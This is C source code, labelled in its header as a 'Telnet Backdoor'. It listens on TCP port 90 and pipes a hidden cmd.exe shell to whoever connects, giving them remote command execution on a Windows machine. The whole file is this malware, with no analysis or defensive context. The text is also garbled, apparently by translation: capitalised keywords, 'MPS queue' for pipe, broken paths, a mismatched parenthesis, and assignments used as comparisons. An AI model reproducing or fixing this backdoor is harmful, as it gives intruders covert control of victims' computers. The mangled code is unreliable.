/*************************************** *************
Created: 2004/10/09
Created: am, am
File base: ini
File Ext: c
Author: Xuefeng
Purpose: Telnet Backdoor
**************************************** ************/
# Include <stdio. h>
# Include <winsock2.h>
# Pragma comment (Lib, "ws2_32.lib ")
# Pragma comment (Lib, "kernel32.lib ")
# Define Port 90
Socket serversocket = invalid_socket;
Socket clientsocket = invalid_socket;
Handle hreadpipe, hwritepipe, hwritefile, hreadfile;
Unsigned char VARA, varb;
// Receive Telnet client information
DWORD winapi threadfunca (lpvoid lpparam)
{
Security_attributes pipeattr;
DWORD nbytetowrite, nbytewritten;
Char recv_buff [1024];
Pipeattr. nlength = sizeof (security_attributes );
Pipeattr. lpsecuritydescriptor = NULL;
Pipeattr. binherithandle = true;
// Create an MPS queue
Createpipe (& hreadpipe, & hwritefile, & pipeattr, 0 );
Vara = 1;
While (true)
{
Sleep (250 );
Nbytetowrite = Recv (clientsocket, recv_buff, 1024, 0 );
Writefile (hwritefile, recv_buff, nbytetowrite, & nbytewritten, null );
}
Return 0;
}
// Send the command execution result to the Telnet Client
DWORD winapi threadfuncb (lpvoid lpparam)
{
Security_attributes pipeattr;
DWORD Len;
Char send_buff [25000];
Pipeattr. nlength = sizeof (security_attributes );
Pipeattr. lpsecuritydescriptor = NULL;
Pipeattr. binherithandle = true;
Createpipe (& hreadfile, & hwritepipe, & pipeattr, 0 );
Varb = 1;
While (true)
{
Readfile (hread file, send_buff, 25000, & Len, null );
Send (clientsocket, send_buff, Len, 0 );
}
Return 0;
}
Void main (void)
{
Wsadata;
Struct sockaddr_in remoteaddr;
DWORD dwthreadida, dwthreadidb, dwthreadparam = 0;
Osversioninfo osvi;
Process_information processinfo;
Startupinfo startinfo;
Char szapp [256];
// Create a Telnet service and listen for waiting for client connection
Wsastartup (makeword (2, 2), & wsadata );
Serversocket = socket (af_inet, sock_stream, ipproto_tcp );
Remoteaddr. sin_family = af_inet;
Remoteaddr. sin_port = htons (port );
Remoteaddr. sin_addr.s_un.s_addr = htonl (inaddr_any );
BIND (serversocket, (lpsockaddr) & remoteaddr, sizeof (remoteaddr ));
Listen (serversocket, 5 );
Vara = 0;
Varb = 0;
Createthread (null, 0, threadfunca, null, 0, & dwthreadida );
Createthread (null, 0, threadfuncb, null, 0, & dwthreadidb );
Do
{
Sleep (250 );
} While (VARA | varb) = 0 );
Getstartupinfo (& startinfo );
// Set background process attributes
Startinfo. dwflags = startf_useshowwindow | startf_usestdhandles;
Startinfo. hstdinput = hreadpipe;
Startinfo. hstderror = hwritepipe;
Startinfo. hstdoutput = hwritepipe;
Startinfo. wshowwindow = sw_hide;
Osvi. dwosversioninfosize = sizeof (osversioninfo );
Getversionex (& osvi );
Getsystemdirectory (szapp, max_path + 1 );
If (osvi. dwplatformid = 2)
{
Strcat (szapp, "// cmd.exe ");
If (CreateProcess (szapp, null, true, 0, null, null, & startinfo,
& Processinfo) = 0)
{
Printf ("create process error! /N ");
Return;
}
}
Else
{
Strcat (szapp, "// command.exe ");
CreateProcess (null, szapp, 0, 0, true, 0, 0, 0, & startinfo, & processinfo );
}
While (true)
{
Clientsocket = accept (serversocket, null, null );
Sleep (250 );
}
}